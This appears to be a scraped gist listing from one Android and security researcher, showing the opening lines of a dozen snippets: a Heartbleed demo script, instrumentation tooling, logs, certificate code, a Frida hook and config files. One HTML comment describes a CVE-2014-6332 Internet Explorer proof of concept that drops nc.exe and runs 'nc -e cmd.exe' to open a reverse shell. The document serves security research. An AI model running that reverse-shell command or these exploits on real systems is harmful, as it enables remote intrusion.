flankerhqd

#!/usr/bin/python

# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.

import sys
import struct
import socket
import time
import select

flankerhqd

/*
 *  Collin's Dynamic Dalvik Instrumentation Toolkit for Android
 *  Collin Mulliner <collin[at]mulliner.org>
 *
 *  (c) 2012,2013
 *
 *  License: LGPL v2.1
 *
 */

flankerhqd

# Path to your oh-my-zsh installation.
export ZSH=$HOME/.oh-my-zsh

# Set name of the theme to load.
# Look in ~/.oh-my-zsh/themes/
# Optionally, if you set this to "random", it'll load a random theme each
# time that oh-my-zsh is loaded.
ZSH_THEME="ys"

# Example aliases

flankerhqd

I/dalvikvm(  705): Ljava/lang/Long;
I/dalvikvm(  705): Landroid/graphics/LightingColorFilter;
I/dalvikvm(  705): Landroid/os/StrictMode$LogStackTrace;
I/dalvikvm(  705): Landroid/net/Uri$Part;
I/dalvikvm(  705): Lcom/android/internal/app/AlertController$ButtonHandler;
I/dalvikvm(  705): Landroid/widget/QuickContactBadge$QueryHandler;
I/dalvikvm(  705): Ljava/security/KeyFactorySpi;
I/dalvikvm(  705): Landroid/util/StateSet;
I/dalvikvm(  705): Lcom/android/org/bouncycastle/asn1/x509/AlgorithmIdentifier;
I/dalvikvm(  705): Ljava/util/concurrent/Executors$DefaultThreadFactory;

flankerhqd

import OpenSSL
from OpenSSL.crypto import *
#assume you've already generated client.cer

#extract CERT.RSA
#openssl pkcs7 -in CERT.RSA -print_certs -inform DER -out cert.cer : CA cert isolated from RSA

cacert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, open('cert.cer','r').read())
pk = OpenSSL.crypto.PKey()
pk.generate_key(OpenSSL.crypto.TYPE_RSA,1024)

flankerhqd

import org.sireum.util._
import org.sireum.jawa.MessageCenter._
import org.sireum.amandroid.alir.reachingFactsAnalysis.AndroidReachingFactsAnalysisConfig
import org.sireum.jawa.util.Timer
import org.sireum.amandroid.security.apiMisuse.InterestingApiCollector
import org.sireum.jawa.MessageCenter._
import org.sireum.amandroid.util.AndroidLibraryAPISummary
import org.sireum.amandroid.AppCenter
import org.sireum.jawa.alir.reachability.ReachabilityAnalysis
import org.sireum.jawa.JawaCodeSource

flankerhqd

<html>
<head>
<!--
CVE-2014-6332 PoC to bypass IE protected mode if enabled (with localhost) then get shell
The PoC drops nc.exe then execute "nc -e cmd.exe -n ip port"
'server_ip' and 'server_port' in javascript below determined the connect back target

Tested on
- IE11 + Windows 7 64-bit (EPM is off)
- IE11 + Windoes 8.1 64-bit (EPM is off)

flankerhqd

script = session.create_script('''
Dalvik.perform(function () {
    var Activity = Dalvik.use("com.example.myapp.MyActivity");
    Activity.hookMe.overload("java.lang.String").implementation = function () {
        Activity.hookMe.overload("java.lang.String").call(args[0], "foo");//comment out this line won't crash
        return "foo";
    };
});
''')
// This result in immediate crash

flankerhqd

The MIT License (MIT)

Copyright (c) 2015 David Weinstein

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

flankerhqd

java -cp soot.jar:app-debug.apk soot.tools.CFGViewer --graph=BriefBlockGraph -src-prec apk -android-jars /home/xxx/android-sdks/platforms/ -process-dir app-debug.apk -f J -allow-phantom-refs